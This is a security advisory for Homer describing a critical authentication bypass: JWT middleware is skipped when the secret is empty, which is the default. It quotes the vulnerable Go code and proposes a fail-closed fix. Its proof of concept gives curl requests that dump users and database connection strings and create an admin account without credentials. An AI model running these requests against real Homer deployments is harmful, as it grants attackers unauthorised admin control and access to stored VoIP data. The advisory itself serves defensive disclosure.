Vulnerability GHSA-rqcc-94gv-wjm9

Critical
CRITICAL RISK
CVSS Score: 9.8
Score Range: 9.0–10.0
Critical severity vulnerabilities (CVSS 9.0–10.0). These represent the highest impact issues.
2 hours ago
October 07, 2026 at 04:11 PM UTC
Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)
<0.0.0-20260625093330-5e90809657c9
<0.0.0-20260625093330-5e90809657c9

Summary

Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)

Details

Summary

Both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated.

Details

coordinator/handlers/auth.go lines 298-304:

func (h *Auth) JWTMiddleware() echo.MiddlewareFunc {
    return func(next echo.HandlerFunc) echo.HandlerFunc {
        return func(c echo.Context) error {
            if h.jwtSecret == "" {
                return next(c)  // bypass — no validation performed
            }

coordinator/handlers/auth_v4_helpers.go lines 177-182:

func (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc {
    return func(next echo.HandlerFunc) echo.HandlerFunc {
        return func(c echo.Context) error {
            if h.jwtSecret == "" {
                return next(c)  // same bypass

coordinator/coordinator.go lines 315-317:

if c.config.JWT.Secret != "" {
    protected.Use(authHandler.JWTMiddleware())  // middleware not even registered when secret is empty
}

config/config.go line 845: Secret field struct tag has default:"". The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.

PoC

# On a default Homer installation (no JWT secret configured), all protected routes are open:
curl http://<homer-host>/api/v3/users
# Returns full user list with no credentials

curl http://<homer-host>/api/v3/databases
# Returns all database connection strings

curl -X POST http://<homer-host>/api/v3/users \
  -H 'Content-Type: application/json' \
  -d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}'
# Creates a new admin user with no credentials

Impact

Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.

Fix

Fail closed: if JWT.Secret is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions:

if h.jwtSecret == "" {
    log.Fatal("coordinator.jwt.secret must be set to a non-empty value")
}

If possible, please apply for a CVE number when posting.

Timeline

Published
2 hours ago
October 07, 2026 at 04:11 PM UTC
Last Modified
2 hours ago
October 07, 2026 at 04:15 PM UTC